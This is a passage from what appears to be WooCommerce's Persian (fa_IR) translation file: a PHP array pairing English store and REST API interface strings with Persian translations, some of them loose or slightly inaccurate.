حمل و نقل برای سفارش.','Total shipping amount for the order.'=>'جمع مبلغ حمل و نقل برای سفارش.','Shipping method ID is required.'=>'شناسه (ID) روش حمل و نقل ضروری است.','Category ID.'=>'شناسه دسته.','List of categories.'=>'فهرست دسته‌ها.','Category name.'=>'نام دسته.','Limit result set to products with a specific SKU.'=>'نتیجه محدود به محصولات با تعریف خاصیت SKU.','Limit result set to products assigned a specific category ID.'=>'نتیجه محدود به محصولات اختصاص یک دسته خاص.','Limit result set to products assigned a specific status.'=>'نتیجه محدود به محصولات اختصاص یک وضعیت خاص.','Variation image data.'=>'اطلاعات تصویر متغیر.','Controls whether or not the variation is listed as "in stock" or "out of stock" on the frontend.'=>'کنترل‌هایی که اینکه آیا محصول به صورت "موجود" یا "موجود نیست" در لیست ثبت شوند یا نه.','Stock management at variation level.'=>'فعال کردن این گزینه سبب فعال کردن اداره انبار در تراز متغیر می شود.','Defaults variation attributes.'=>'ویژگی‌های متغیر پیشفرض.','Tag slug.'=>'نامک برچسب.','Category slug.'=>'نامک دسته.','List of related products IDs.'=>'فهرست شناسه‌های محصولات مرتبط.','Product slug.'=>'.نامک محصول.','Enable/Disable attribute archives.'=>'فعال/غیرفعال کردن بایگتنی ویژگی.','Image URL.'=>'آدرس URL تصویر.','Type of attribute.'=>'انواع ویژگی.','Attribute name.'=>'نام ویژگی.','Menu order, used to custom sort the resource.'=>'فهرست سفارش، بکاربردن برای مرتب‌سازی منابع سفارشی.','Limit result set to orders assigned a specific customer.'=>'نتیجه محدود به تنظیم مرتب‌سازی مشتری خاص.','Limit result set to orders assigned a specific status.'=>'نتیجه محدود به تنظیم مرتب‌سازی وضعیت خاص.','Refund ID.'=>'شناسه بازپرداخت.','Country code in ISO 3166-1 alpha-2 format.'=>'کد کشور در قالب ISO 3166-1 alpha-2. .','The date the order was last modified, in the site\'s timezone.'=>'زمان آخرین ویرایش سفارش، در منطقه زمانی سایت. .','The date the order was created, in the site\'s timezone.'=>'زمان ایجاد سفارش، در منطقه زمانی سایت. .','Order item ID provided is not associated with order.'=>'شناسه مورد سفارش ارائه شده با سفارش مورد نظر وجود ندارد.','Meta label.'=>'متای لیبل.','Line item meta data.'=>'مورد خط داده متا.','Meta value.'=>'متای مقدار.','Meta key.'=>'متای کلید.','Term name.'=>'نام شرایط.','Default sort order.'=>'مرتب‌سازی پیشفرض.','Line item ID is required.'=>'شناسه ردیف اقلام مورد نیاز است.','Webhooks do not support trashing.'=>'Webhooks از حذف شده‌ها پشتیبانی نمی کند.','Limit result set to resources with a specific role.'=>'نتیجه محدود به تنظیم منابع با قانون خاص.','Limit result set to resources with a specific email.'=>'نتیجه محدود به تنظیم منابع با ایمیل خاص.','Invalid resource id for reassignment.'=>'شناسه منبع نامعتبر برای تغییر دوباره.','Customers do not support trashing.'=>'مشتری‌ها از حذف شده‌ها پشتیبانی نمی کند.','Limit result set to resources with a specific code.'=>'نتیجه محدود به منابع با کد خاص.','Invalid nonce - nonce has already been used.'=>'اشتباه است - قبلا استفاده شده است.','Learn more about shipping zones'=>'اطلاعات بیشتر درباره مناطق حمل و نقل','Setup shipping zones'=>'راه اندازی مناطق حمل و نقل','Add shipping methods & zones'=>'افزودن شیوه حمل و نقل & مناطق','How many times the coupon can be used per customer.'=>'تعداد دفعاتی که کوپون تخفیف می‌تواند برای هر خریدار مورد استفاده قرار گیرد.','Shipping is currently enabled, but you have not added any shipping methods to your shipping zones.'=>'حمل و نقل درحال حاضر فعال است، اما هیچ شیوه حمل و نقلی برای مناطق حمل و نقل اضافه نکرده‌اید.','Order ID.'=>'شناسه سفارش.','Invalid order ID.'=>'شناسه سفارش نامعتبر است.','Download ID (MD5).'=>'شناسه دانلود (MD5).','Invalid order refund ID.'=>'شناسه استرداد هزینه نامعتبر است.','Last order ID.'=>'شناسه آخرین سفارش.','Downloadable product ID.'=>'شناسه محصول قابل دانلود.','Phone number.'=>'شماره تلفن.','Reason for refund.'=>'دلیل استرداد.','Maximum order amount allowed when using the coupon.'=>'حداکثر مبلغ سفارش مجاز هنگام استفاده از کدتخفیف.','Quantity of orders made by the customer.'=>'تعداد سفارشات ساخته شده توسط مشتری.','Number of times the coupon has been used already.'=>'تعداد دفعاتی که کدتخفیف در حال حاضر استفاده شده است.','Number of downloads remaining.'=>'تعداد دفعات باقی مانده دانلود.','Determines the type of discount that will be applied.'=>'تعیین نوع تخفیفی که اعمال خواهد شد.','The date when download access expires, in the site\'s timezone.'=>'تاریخی که دسترسی به دانلود منقضی می شود، در منطقه زمانی سایت.','The date the order refund was created, in the site\'s timezone.'=>'تاریخ ایجاد استرداد هزینه سفارش، در منطقه زمانی سایت.','The date the order note was created, in the site\'s timezone.'=>'تاریخ ایجاد یادداشت سفارش، در منطقه زمانی سایت.','The date the customer was created, in the site\'s timezone.'=>'تاریخ ایجاد مشتری، منطقه زمانی سایت.','The date the customer was last modified, in the site\'s timezone.'=>'تاریخ آخرین ویرایش مشتری، منطقه زمانی سایت.','Max number of items in the cart the coupon can be applied to.'=>'بیشترین تعداد اقلام سبدخرید که کدتخفیف می تواند روی آن‌ها اعمال گردد.','Line items data.'=>'اطلاعات اقلام خط.','Last order data.'=>'اطلاعات آخرین سفارش.','File details.'=>'اطلاعات فایل.','Address line 2.'=>'ادامه آدرس.','Invalid signature - provided signature does not match.'=>'امضاء نامعتبر است - امضای ارائه شده مطابقت ندارد.','Invalid signature - failed to sort parameters.'=>'امضاء نامعتبر است - موفق به مرتب کردن پارامترها نشد.','Invalid signature - signature method is invalid.'=>'امضا نامعتبر است - روش امضا نامعتبر است.','Invalid order item.'=>'اقلام سفارش نامعتبر.','Address line 1.'=>'آدرس.','Email address.'=>'آدرس ایمیل.','The email address for the customer.'=>'آدرس ایمیل برای مشتری.','Email address is invalid.'=>'آدرس ایمیل نامعتبر است.','Customer password.'=>'گذرواژه مشتری.','Postal code.'=>'کدپستی.','ISO code or name of the state, province or district.'=>'کد یا نام استان.','Order key.'=>'کلید سفارش.','Order note.'=>'یادداشت سفارش.','An error occurred while attempting to create the refund using the payment gateway API.'=>'هنگام تلاش برای ایجاد بازپرداخت با استفاده از API دروازه پرداخت خطایی رخ داده است.','Shows/define if the note is only for reference or for the customer (the user will be notified).'=>'نشان دهید / تعریف کنید که یادداشت تنها برای ارجاع است یا برای مشتری (کاربر مطلع خواهد شد) است.','First name.'=>'نام.','Company name.'=>'نام شرکت.','City name.'=>'نام شهر.','Customer first name.'=>'نام خریدار.','Customer last name.'=>'نام خانوادگی خریدار.','Last name.'=>'نام خانوادگی.','Customer login name.'=>'نام کاربری مشتری.','Product name.'=>'نام محصول.','Downloadable file name.'=>'نام فایل قابل دانلود.','File name.'=>'نام فایل.','Cannot create order note, please try again.'=>'نمی توان یادداشت سفارش را ایجاد کرد، لطفا دوباره سعی کنید.','Cannot create order refund, please try again.'=>'نمی توان هزینه سفارش را پس داد، لطفا دوباره سعی کنید.','Total amount spent.'=>'مجموع مبلغ خرج شده.','Refund amount must be greater than zero.'=>'مبلغ استرداد باید بزرگتر از صفر باشد.','Refund amount.'=>'مبلغ استراد شده.','Cannot create existing resource.'=>'منابع موجود را نمی توان ایجاد کرد.','List of category IDs the coupon applies to.'=>'لیست شناسه‌های دسته‌هایی که کد تخفیف بر آن‌ها اعمال می شود.','List of product IDs the coupon can be used on.'=>'لیست شناسه‌های محصولاتی که کدتخفیف می تواند برای آن‌ها استفاده شود.','List of product IDs the coupon cannot be used on.'=>'لیست شناسه ‌های محصولاتی که کدتخفیف نمی تواند برای آن ‌ها استفاده شود.','List of shipping address data.'=>'لیست داده‌های آدرس حمل و نقل.','List of email addresses that can use this coupon.'=>'لیست آدرس ایمیل‌هایی که می توانند از این کدتخفیف استفاده کنند.','Download file URL.'=>'لینک دانلود فایل.','Avatar URL.'=>'لینک آواتار.','File URL.'=>'لینک فایل.','List of billing address data.'=>'فهرست اطلاعات آدرس صورتحساب.','WooCommerce database update'=>'بروز رسانی دیتابیس ووکامرس','Coupon description.'=>'توضیحات کدتخفیف.','The date the coupon was last modified, in the site\'s timezone.'=>'تاریخ آخرین ویرایش کدتخفیف در منطقه زمانی سایت.','The date the coupon was created, in the site\'s timezone.'=>'تاریخ ایجاد کدتخفیف، در منطقه زمانی سایت.','Legacy shipping methods (flat rate, international flat rate, local pickup and delivery, and free shipping) are deprecated but will continue to work as normal for now. They will be removed in future versions of WooCommerce. We recommend disabling these and setting up new rates within shipping zones as soon as possible.'=>'روش‌های حمل و نقل قدیمی (حمل و نقل رایگان، تحویل و دریافت حضوری، و حمل و نقل رایگان) منسوخ شده‌اند اما بصورت عادی برای الان کار میکنند. در نسخه‌های آتی ووکامرس حذف می‌شوند. اکیدا توصیه می‌کنیم این تنظیمات را غیرفعال کنید و از مناطق حمل و نقل بجای آن استفاده کنید.','Customers will not be able to purchase physical goods from your store until a shipping method is available.'=>'مشتری‌ها تا زمانی که روش حمل و نقلی دردسترس نباشد، قادر به خرید محصولات فیزیکی از فروشگاه شما نیستند.','Coupon code.'=>'کد تخفیف.','The coupon code cannot be empty.'=>'کد تخفیف نمی تواند خالی باشد.','List of category IDs the coupon does not apply to.'=>'لیست شناسه‌های دسته‌هایی که کد تخفیف بر آنها اعمال نمی شود.','Unique identifier for the resource.'=>'شناسه یکتا برای منبع.','Whether to bypass trash and force deletion.'=>'دور زدن سطل زباله و اجبار به حذف.','Minimum order amount that needs to be in the cart before coupon applies.'=>'حداقل مقدار سفارشی که باید قبل از اعمال کد تخفیف در سبد خرید باشد.','Order is invalid'=>'سفارش نامعتبر است','Invalid resource id.'=>'شناسه منبع نامعتبر. .','The API key provided does not have write permissions.'=>'کلید API ارائه شده مجوز نوشتن ندارد.','Item ID.'=>'شناسه مورد.','The API key provided does not have read permissions.'=>'کلید API ارائه شده مجوز خواندن ندارد.','Invalid timestamp.'=>'برچسب زمان نامعتبر است.','Consumer key is invalid.'=>'کلید مصرف کننده نامعتبر است.','Username isn\'t editable.'=>'نام کاربری قابل ویرایش نیست.','UTC DateTime when the coupon expires.'=>'تاریخ و زمان انقضاء کدتخفیف براساس UTC.','Unique identifier for the object.'=>'شناسه یکتا برای پروژه.','ISO code of the country.'=>'کد ISO کشور.','Page ID is set, but the page does not exist'=>'شناسه برگه تنظیم شد اما برگه وجود ندارد','Your server does not support the %s function - this is required to use the GeoIP database from MaxMind.'=>'سرور شما از تابع %s پشتیبانی نمی کند - این ضروری است برای استفاده از پایگاه داده GeoIP از MaxMind.','The version of cURL installed on your server.'=>'نسخه نصب شده cURL روی سرور شما.','Displays whether or not WP Cron Jobs are enabled.'=>'نمایش فعال بودن یا نبودن قابلیت WP Cron.','The secret key is used to generate a hash of the delivered webhook and provided in the request headers.'=>'کلیدهای مخفی بری تولید hash از webhook برگشتی و ارائه شده در سربرگ‌های درخواستی است.','Archive template'=>'پوسته بایگانی','WordPress requirements'=>'ملزومات وردپرس','Dismiss'=>'رد کردن','For example:'=>'برای مثال:','Add as many zones as you need – customers will only see the methods available for their address.'=>'افزودن تعداد زیادی از مناطق بسته به نیاز شما – مشتریان فقط روش‌هایی را می بینند که برای آدرس آن‌ها وجود دارند.','a group of regions that can be assigned different shipping methods and rates.'=>'گروهی از نواحی که می تواند به روش‌های مختلف حمل و نقل اشاره کند.','Postcode for this rule. Semi-colon (;) separate multiple values. Leave blank to apply to all areas. Wildcards (*) and ranges for numeric postcodes (e.g. 12345...12350) can also be used.'=>'کد پستی برای این قانون. Semi-colon (;) برای جدا کردن مقادیر متعدد. برای اعمال بر همه مناطق خالی بگذارید. نشانه‌های عام (*) و محدوده عددی کدپستی (مثال 12345... 12350) نیز می تواند استفاده شود.','US domestic zone = All US states = Flat rate shipping'=>'منطقه داخلی امریکا = همه ایالات‌های آمریکا = نرخ ثابت حمل و نقل','Your theme has a woocommerce.php file, you will not be able to override the woocommerce/archive-product.php custom template since woocommerce.php has priority over archive-product.php. This is intended to prevent display issues.'=>'قالب شما پرونده woocommerce.php دارد، نمی توانید woocommerce/archive-product.php باطل کنید در پوسته سفارشی تا زمانی که woocommerce.php بر archive-product.php اولویت دارد.این برای جلوگیری از بروز مشکلات نمایشی است.','Rest of the world'=>'بقیه دنیا','New:'=>'جدید:','Europe zone = Any country in Europe = Flat rate shipping'=>'منطقه اروپا = هر کشوری در اروپا = نرخ ثابت حمل و نقل','Add shipping zone'=>'افزودن منطقه حمل و نقل','List 1 postcode per line'=>'1 کدپستی در هر خط لیست کنید','Limit to specific ZIP/postcodes'=>'محدودیت برای کدپستی خاص','MaxMind GeoIP database.'=>'پایگاه داده MaxMind GeoIP.','cURL version.'=>'نسخه cURL.','Zone name'=>'نام منطقه','Product count'=>'تعداد محصولات','Sell to specific countries'=>'فروش به کشورهای خاص','Delete payment method'=>'حذف شیوه پرداخت','Payment methods'=>'شیوه پرداخت','Addresses'=>'آدرس‌ها','You can add multiple shipping methods within this zone. Only customers within the zone will see them.'=>'شما می توانید چند روش حمل و نقل در این منطقه اضافه نمائید. فقط مشتریان در این منطقه، آن‌ها را خواهند دید.','Your changes were not saved. Please retry.'=>'تغییرات شما ذخیره نشدند. لطفا دوباره سعی کنید.','Drag and drop to re-order your custom zones. This is the order in which they will be matched against the customer address.'=>'برای مرتب کردن مناطق دلخواه آن‌ها را بکشی و رها کنید. این نظم در برابر آدرس مشتری همسان خواهد بود.','Ship to specific countries'=>'ارسال به کشور‌های خاص','Do you wish to save your changes first? Your changed data will be discarded if you choose to cancel.'=>'آیا مایلید ابتدا تغییرات را ذخیره کنید؟ اگر لغو را انتخاب کنید تغییرات ایجاد شده شما از بین خواهند رفت.','A shipping zone is a geographic region where a certain set of shipping methods and rates apply.'=>'یک منطقه حمل و نقل، یک ناحیه جغرافیایی است که یک مجموعه مشخص از روش‌های حمل و نقل و نرخ‌ها بکار گرفته می شوند.','Show subcategories & products'=>'نمایش زیر دسته‌ها و محصولات','No shipping classes have been created.'=>'هیچ کلاس حمل و نقلی ایجاد نشده است.','Add shipping class'=>'افزودن کلاس حمل و نقل','Shipping location(s)'=>'محل(های) حمل و نقل','Region(s)'=>'ناحیه(ها)','Close modal panel'=>'بستن پنل','Add shipping method'=>'افزودن روش حمل و نقل','This shipping method does not have any settings to configure.'=>'این روش حمل و نقل هیچ تنظیماتی جهت پیکربندی ندارد.','Shipping method could not be added. Please retry.'=>'روش حمل و نقل نتوانست اضافه شود. لطفا دوباره سعی کنید.','Force shipping to the customer billing address'=>'اجبار حمل و نقل به آدرس صورتحساب مشتری','Default to customer shipping address'=>'پیشفرض به آدرس حمل و نقل مشتری','Disable shipping & shipping calculations'=>'غیر فعال کردن حمل‌ونقل و محاسبات حمل‌ونقل','Show categories & products'=>'نمایش دسته‌ها و محصولات','Show categories'=>'نمایش دسته‌ها','Zone does not exist!'=>'منطقه وجود ندارد !','Calculations'=>'محاسبات','Downloads'=>'دانلودها','Edit failed. Please try again.'=>'ویرایش نشد. لطفا دوباره سعی کنید.','Sell to all countries, except for…'=>'فروش به همه کشورها, غیر از ;','This option determines a customers default location. The MaxMind GeoLite Database will be periodically downloaded to your wp-content directory if using geolocation.'=>'این گزینه مکان پیشفرض مشتریان را تعیین می کند. پایگاه داده GeoLite MaxMind به صورت دوره ای در دایرکتوری wp-content دانلود خواهد شد اگر از مکان یابی (geolocation) استفاده کنید..','Endpoint for the delete payment method page.'=>'ارجاع برای حذف برگه شیوه پرداخت.','Endpoint for the "My account → Payment methods" page.'=>'ارجاع به صفحه " حساب کاربری من ; شیوه پرداخت ".','Default to customer billing address'=>'ارسال به آدرس صورتحساب مشتری به صورت پیشفرض','No location by default'=>'بدون مکان پیشفرض','Default customer location'=>'مکان پیشفرض مشتری','Endpoint for the setting a default payment method page.'=>'ارجاع برای تنظیم برگه شیوه پرداخت پیشفرض.','Set default payment method'=>'تنظیم روش پرداخت پیشفرض','Customer download link'=>'لینک دانلود مشتری','Note: the refund reason will be visible by the customer.'=>'توجه: دلیل بازپرداخت توسط مشتری قابل مشاهده است.','Add item(s)'=>'افزودن اقلام','Delete item'=>'حذف مورد','Edit item'=>'ویرایش مورد','This order is no longer editable.'=>'این سفارش دیگر قابل ویرایش نیست.','Tax status'=>'وضعیت مالیات','Stock quantity'=>'موجودی انبار','A simple offline gateway that lets you accept a check as method of payment.'=>'روشی آسان برای پرداخت غیر آنلاین که به شما اجازه پرداخت بصورت چک را می دهد.','Sorry, you cannot list resources.'=>'متاسفانه نمی توانید منابع را لیست کنید.','Limit response to resources published before a given ISO8601 compliant date.'=>'محدود کردن پاسخ به منابع قبل از انتشار ISO8601 تاریخ سازگار.','Limit response to resources published after a given ISO8601 compliant date.'=>'محدود کردن پاسخ به منابع پس از انتشار ISO8601 تاریخ سازگار.','The %s cannot be deleted.'=>'%s نمی تواند حذف شود.','The %s has already been deleted.'=>'%s حذف شده است.','The %s does not support trashing.'=>'%s حذف شده‌ها را پشتیبانی نمی‌کند.','Sorry, you are not allowed to delete %s.'=>'متاسفانه شما اجازه ندارید %s حذف کنید.','ID is invalid.'=>'شناسه نامعتبر است.','Sorry, you are not allowed to delete this resource.'=>'متاسفانه نمی توانید این منابع را حذف کنید.','Sorry, you are not allowed to edit this resource.'=>'متاسفانه نمی توانید منابع را ویرایش کنید.','Sorry, you cannot view this resource.'=>'متاسفانه نمی توانید منابع را مشاهده کنید.','Sorry, you are not allowed to create resources.'=>'متاسفانه نمی توانید منابع را ایجاد کنید.','Limit result set to resources with a specific slug.'=>'مجموعه نتیجه محدود به منابع با نامک خاص.','Limit result set to resources assigned to a specific product.'=>'مجموعه نتیجه محدود به منابع محصول خاص.','Whether to hide resources not assigned to any products.'=>'پنهان کردن منابع به هر گونه محصولات اختصاص داده شده.','The resource cannot be deleted.'=>'منابع نمی تواند حذف شود.','Resource does not support trashing.'=>'منابع از حذق شده‌ها پشتیبانی نمی کند.','Can not set resource parent, taxonomy is not hierarchical.'=>'نمی توان برای منابع والد تنظیم کرد،طبقه بندی سلسله مراتبی نمی باشد.','Sorry, you cannot update resource.'=>'شما نمی توانید منابع را بروزرسانی کنید.','Sorry, you cannot create new resource.'=>'شما نمی توانید منابع جدید ایجاد کنید.','Required to be true, as resource does not support trashing.'=>'باید درست باشد، از آنجا که منابع حذف شده‌ها را پشتیبانی نمی کند.','Use WP Query arguments to modify the response; private query vars require appropriate authorization.'=>'استفاده از آرگومانWP Query برای تغییر پاسخ; جستجوهای خصوصی متغیرها نیاز به مجوز مناسب دارد.','Offset the result set by a specific number of items.'=>'افست در نتیجه تعیین شده توسط یک شماره خاص از اقلام است.','Limit result set to specific ids.'=>'نتیجه محدود به تنظیم شناسه‌های خاص.','A simple offline gateway that lets you accept BACS payment.'=>'درگاه آفلاین ساده که به شما اجازه قبول پرداخت BACS می دهد.','Accept payments via PayPal using account balance or credit card.'=>'پرداخت از طریق پی پال با استفاده از مانده حساب یا کارت اعتباری.','Check payment methodCheck payments'=>'پرداخت با چک','Community forum'=>'فروم پشتیبانی','Taxonomy does not exist.'=>'طبقه بندی وجود ندارد.','Sorry, you cannot delete this resource.'=>'شما نمی توانید منابع را حذف کنید.','Limit result set to all items except those of a particular parent ID.'=>'مجموعه نتیجه محدود به همه موارد بجز شناسه والد خاص.','Limit result set to those of particular parent IDs.'=>'مجموعه نتیجه محدود به شناسه‌های والد خاص.','Save to account'=>'ذخیره در حساب کاربری','Invalid ID.'=>'شناسه نامعتبر.','Invalid post ID.'=>'شناسه نوشته نامعتبر است.','Items'=>'آیتم‌ها','Unable to accept more than %s items for this request.'=>'نمی توان بیشتر از %s محصول را در این درخواست قبول کرد.','Cannot create existing %s.'=>'نمی توان موجودی %s ایجاد کرد.','Learn more about coupons'=>'در مورد کدهای تخفیف بیشتر بدانید','Coupons are a great way to offer discounts and rewards to your customers. They will appear here once created.'=>'کدتخفیف یک راه عالی برای ارائه تخفیف و پاداش به مشتریان شماست. آن‌ها پس از ایجاد در اینجا ظاهر خواهند شد.',' Stripe'=>' استرایپ','When you receive a new order, it will appear here.'=>'وقتی سفارش جدیدی دریافت می‌کنید، در اینجا نمایش داده می‌شود.','List of delete resources.'=>'لیست منابع حذف شده.','List of updated resources.'=>'لیست منابع بروز شده.','List of created resources.'=>'لیست منابع ایجاد شده.','Resource does not exist.'=>'منبع وجود ندارد.','Are you sure you wish to delete this note? This action cannot be undone.'=>'آیا اطمینان دارید که می خواهید این یاداشت پاک شود؟ این عمل بازگشت ناپذیر است.','Bank transfer (BACS) payments'=>'پرداخت با انتقال بانکی (BACS)','Learn more about orders'=>'در مورد سفارشات بیشتر بدانید','Ready to start selling something awesome?'=>'آماده اید برای شروع فروش چیزی بسیار جذاب؟','Order sort attribute ascending or descending.'=>'مرتب‌سازی صعودی یا نزولی بر اساس ویژگی.','Sort collection by resource attribute.'=>'مجموعه مرتب‌سازی بر اساس ویژگی منابع.','Sort collection by object attribute.'=>'مجموعه مرتب‌سازی بر اساس ویژگی محصول.','Sorry, you are not allowed to batch manipulate this resource.'=>'متاسفانه! شما برای دستکاری در این منابع اجازه ندارید.','Help & Support'=>'راهنما و پشتیبانی','A simple offline gateway that lets you accept cash on delivery.'=>'یک درگاه آفلاین ساده که به شما امکان می‌دهد هنگام تحویل، وجه نقد دریافت کنید.','South America'=>'آمریکای جنوبی','Oceania'=>'اقیانوسیه','North America'=>'آمریکای شمالی','Europe'=>'اروپا','Asia'=>'آسیا','Africa'=>'آفریقا','Samoa'=>'Samoa','United States (US) Minor Outlying Islands'=>'United States (US) Minor Outlying Islands','Copying to clipboard failed. Please press Ctrl/Cmd+C to copy.'=>'کپی برداری در کلیپ برد ناموفق بود. لطفا برای کپی کردن دکمه‌های Ctrl/Cmd+C را فشار دهید.','Saudi riyal'=>'Saudi riyal','Please enter a stronger password.'=>'لطفا یک گذرواژه قوی تر وارد کنید.','Payment for order %s refunded'=>'وجه پرداختی برای سفارش %s بازگردانده شد','Cancelled order emails are sent to chosen recipient(s) when orders have been marked cancelled (if they were previously processing or on-hold).'=>'ایمیل‌های سفارش لغو شده هنگامی که سفارش لغو شده علامتگذاری شود، به گیرندگان فرستاده می شود (اگر آن‌ها قبلا در وضعیت در حال انجام و یا در انتظار بررسی بوده باشند).','Be the first to review “%s”'=>'اولین کسی باشید که دیدگاهی می نویسد “%s”','Unfortunately your order cannot be processed as the originating bank/merchant has declined your transaction. Please attempt your purchase again.'=>'متاسفانه پردازش سفارش شما ممکن نیست. درگاه پرداخت (بانک) انتخاب شده، این پرداخت را نپذیرفت. لطفا دوباره خرید خود را تکرار کنید.','Payment for order #%1$s from %2$s has failed. The order was as follows:'=>'پرداخت برای سفارش #%1$s از %2$s با شکست مواجه شد. سفارش به شرح زیر است:','Clear'=>'پاک کردن','(includes %s)'=>'(شامل %s)','Hide empty categories'=>'عدم نمایش دسته‌های خالی','Pakistani rupee'=>'Pakistani rupee','Kenyan shilling'=>'Kenyan shilling','Invalid product ID.'=>'شناسه نامعتبر محصول.','[{site_title}]: New order #{order_number}'=>'[{site_title}] سفارش جدید ({order_number})','Failed order'=>'خرید ناموفق','Error: Delivery URL cannot be reached: %s'=>'خطا: آدرس تحویل نمی تواند برسد به:%s','Error: Delivery URL returned response code: %s'=>'خطا آدرس تحویل یک کد پاسخ برگرداند: %s','Please select some product options before adding this product to your cart.'=>'لطفا برخی از گزینه‌های محصول را قبل از اضافه کردن آن به سبد خرید، انتخاب کنید.','WooCommerce database update complete. Thank you for updating to the latest version!'=>'دیتای ووکامرس بروز شد. از شما برای بروزرسانی به آخرین نگارش سپاسگزاریم!','Standard rate'=>'نرخ استاندارد','State / Zone'=>'استان / منطقه','Tax class already exists'=>'کلاس مالیاتی در حال حاضر وجود دارد','Your server does not support the %s functions - this is required for better character encoding. Some fallbacks will be used instead for it.'=>'سرور شما از توابع %s پشتیبانی نمی کند - این توابع برای رمز گذاری بهتر بر روی کاراکترها مورد نیاز است. برخی جایگزین‌ها به جای این قابلیت استفاده می شود.','Your server does not have the %s class enabled - some gateway plugins which use SOAP may not work as expected.'=>'در سرور شما تابع %s فعال نیست - برخی افزونه‌های پرداخت از SOAP استفاده می کنند و به خوبی کار نخواهند کرد.','%1$s - We recommend a minimum MySQL version of 5.6. See: %2$s'=>'%1$s - ما حداقل نسخه 5.6 را برای MySQL پیشنهاد می کنیم. مشاهده کنید: %2$s','%1$s - We recommend setting memory to at least 64MB. See: %2$s'=>'%1$s - ما توصیه می کنیم که حافظه memory را حداقل بر روی 64 مگابایت تنظیم نمائید. مشاهده کنید: %2$s','Increasing memory allocated to PHP'=>'افزایش حافظه انتساب داده شده به PHP','Multibyte String (mbstring) is used to convert character encoding, like for emails or converting characters to lowercase.'=>'چندین رشته (mbstring) جهت رمزگزاری کاراکترها استفاده می شوند. مثلا در ایمیلها و یا تبدیل حروف به حروف کوچک.','Last page'=>'برگه آخر','Next page'=>'برگه بعدی','Previous page'=>'برگه قبلی','No matching tax rates found.'=>'هیچ نرخ مالیاتی منطبقی یافت نشد.','First page'=>'برگه نخست','Tax rate ID: %s'=>'شناسه نرخ مالیات: %s','"%s" tax rates'=>'"%s" نرخ مالیات','Your changed data will be lost if you leave this page without saving.'=>'اگر این صفحه را بدون ذخیره ترک کنید، داده‌های تغییر داده شده شما، از دست خواهد رفت.','Loading…'=>'بارگذاری;','Search…'=>'جستجو;','Manual'=>'دستی','Manually sent'=>'به صورت دستی ارسال شد','"From" address'=>'"از" آدرس','Email notifications sent from WooCommerce are listed below. Click on an email to configure it.
%s'=>'اعلان‌های ایمیل ارسال شده از ووکامرس به شرح زیر است. با کلیک روی یک ایمیل آن را پیکربندی کنید.
%s','Footer text'=>'متن پابرگ','Content type'=>'نوع محتوا','Email notifications'=>'اطلاع رسانی‌های ایمیل','%s average gross daily sales'=>'%s میانگین فروش‌های درشت روزانه','Average gross sales amount'=>'میانگین میزان فروش ناخالص','%s average gross monthly sales'=>'%s میانگین فروش ناخالص ماهیانه','If you need to access the setup wizard again, please click on the button below.'=>'اگر شما نیاز دارید دوباره به نصب کننده دسترسی پیدا کنید، لطفا بر روی دکمه زیر کلیک کنید.','Product permalinks'=>'پیوند‌های یکتای محصول','Setup wizard'=>'برنامه راهنمای راه اندازی','Seti'=>'Seti','Sagarmatha'=>'Sagarmatha','Rapti'=>'Rapti','Narayani'=>'Narayani','Mahakali'=>'Mahakali','Dhaulagiri'=>'Dhaulagiri','Mechi'=>'Mechi','Lumbini'=>'Lumbini','Koshi'=>'Koshi','Karnali'=>'Karnali','Janakpur'=>'Janakpur','Gandaki'=>'Gandaki','Bheri'=>'Bheri','Putrajaya'=>'Putrajaya','Labuan'=>'Labuan','Malacca (Melaka)'=>'Malacca (Melaka)','Bagmati'=>'Bagmati','Penang (Pulau Pinang)'=>'Penang (Pulau Pinang)','Kuala Lumpur'=>'Kuala Lumpur','Buy now'=>'همین الان بخرید','Monthly'=>'ماهانه','shop_order post type singular nameOrder'=>'سفارش','Show more details'=>'نمایش جزییات بیشتر','via %s'=>'توسط %s','%s removed.'=>'%s حذف شد.','Enter recipients (comma separated) that will receive this notification.'=>'نام دریافت کنندگان (با کاما جدا کنید) را برای دریافت این آگهی اطلاع رسانی وارد کنید.','Drag and drop, or click to set admin variation order'=>'بکشید و رها کنید (درگ و دراپ) یا برای متغیر سفارش مدیر کلیک کنید','Found in your order confirmation email.'=>'شماره سفارش در ایمیل ارسال شده به شما موجود است.','Search for:'=>'جستجو برای:','This product is currently out of stock and unavailable.'=>'در حال حاضر این محصول در انبار موجود نیست و در دسترس نمی باشد.','Note:'=>'یادداشت:','SKU:'=>'شناسه محصول:','Add a review'=>'دیدگاه خود را بنویسید','Leave a Reply to %s'=>'ارسال یک پاسخ به %s','Submit'=>'ثبت','Perfect'=>'عالی','Good'=>'خوب','Average'=>'متوسط','Not that bad'=>'نه خیلی بد','submit buttonSearch'=>'جستجو','Your review'=>'دیدگاه شما','Very poor'=>'خیلی بد','Your rating'=>'امتیاز شما','Your review is awaiting approval'=>'دیدگاه شما پس از تایید نمایش داده می شود','Related products'=>'محصولات مرتبط','Order details'=>'مشخصات سفارش','Order again'=>'سفارش دوباره','Billing email'=>'ایمیل صورتحساب','Available downloads'=>'دانلودهای در دسترس','Recent orders'=>'سفارش‌های اخیر','You have not set up this type of address yet.'=>'شما هنوز این آدرس را ثبت نکرده‌اید.','To track your order please enter your Order ID in the box below and press the "Track" button. This was given to you on your receipt and in the confirmation email you should have received.'=>'برای پیگیری سفارش، لطفا شماره سفارش و آدرس ایمیل خود را در کادرهای زیر وارد کرده و دکمه پیگیری را فشار دهید. /home/filetir/public_html/wp-content/languages/plugins/woocommerce-fa_IR.l10n.php: شماره سفارش از طریق رسید و ایمیلی که به شما ارسال شده در اختیارتان قرار گرفته است.','Only logged in customers who have purchased this product may leave a review.'=>'.فقط مشتریانی که این محصول را خریداری کرده اند و وارد سیستم شده اند میتوانند برای این محصول دیدگاه(نظر) ارسال کنند.','verified owner'=>'خریدار محصول','There are no reviews yet.'=>'هنوز بررسی‌ای ثبت نشده است.','Order ID'=>'شناسه سفارش (ID)','l jS \\o\\f F Y, h:ia'=>'l j F Y، h:ia','Order number.'=>'شماره سفارش.','Track'=>'پیگیری','An ecommerce toolkit that helps you sell anything. Beautifully.'=>'یک جعبه ابزار تجارت الکترونیک که به شما کمک می‌کند هر چیزی را به زیبایی به فروش برسانید.','Rate…'=>'رای دهید;','You may also like…'=>'همچنین ممکن است دوست داشته باشید;','Email:'=>'ایمیل:','Email you used during checkout.'=>'ایمیلی که در هنگام ثبت سفارش وارد کردید.','Order updates'=>'بروز رسانی‌های سفارش','%s download remaining'=>'%s از دانلود باقی مانده','One review for %s'=>'یک نقد برای %s','Category:'=>'دسته:','Tag:'=>'برچسب:','%s customer review'=>'%s بازخورد مشتری','Sorry, this order is 